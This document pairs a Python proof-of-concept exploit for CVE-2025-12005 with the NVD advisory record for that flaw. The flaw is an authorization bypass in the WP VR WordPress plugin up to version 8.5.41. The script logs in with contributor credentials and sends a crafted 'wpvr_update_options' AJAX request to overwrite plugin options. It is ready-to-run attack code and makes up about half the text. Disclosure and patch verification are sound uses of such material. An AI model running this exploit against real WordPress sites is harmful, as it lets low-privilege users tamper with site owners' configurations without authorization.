CVE-2025-12005

# CVE-2025-12005 PoC - WP VR Plugin Authorization Bypass # Authentication Required: Contributor or higher role # Target: WordPress site with WP VR plugin <= 8.5.41 import requests import sys def exploit_wpvr_auth_bypass(target_url, username, password, malicious_option): """ Exploits CVE-2025-12005 to modify WP VR plugin options without proper authorization check. Args: target_url: Base URL of WordPress site username: WordPress username with contributor+ access password: WordPress password malicious_option: JSON string with options to modify """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } resp = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Send malicious AJAX request to update options ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Action: wpvr_update_options # This endpoint lacks proper capability checks exploit_data = { 'action': 'wpvr_update_options', 'wpvr_options': malicious_option # Malicious configuration } resp = session.post(ajax_url, data=exploit_data) if resp.status_code == 200: print("[+] Exploit sent - check if options were modified") print(f"[+] Response: {resp.text}") return True else: print(f"[-] Exploit failed with status: {resp.status_code}") return False # Example usage if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <url> <username> <password> '<json_options>'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] options = sys.argv[4] exploit_wpvr_auth_bypass(target, user, pwd, options)

{"cve": {"id": "CVE-2025-12005", "sourceIdentifier": "[email protected]", "published": "2025-10-25T06:15:35.897", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP VR – 360 Panorama and Free Virtual Tour Builder For WordPress plugin for WordPress is vulnerable to unauthorized access of data in all versions up to, and including, 8.5.41. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor level access and above, to modify sensitive plugin options."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpvr/tags/8.5.41/admin/class-wpvr-admin.php#L295", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpvr/tags/8.5.41/admin/classes/class-wpvr-ajax.php#L467", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9bcbc0cf-69e5-4d6e-8987-a0fbbaf41740?source=cve", "source": "[email protected]"}]}}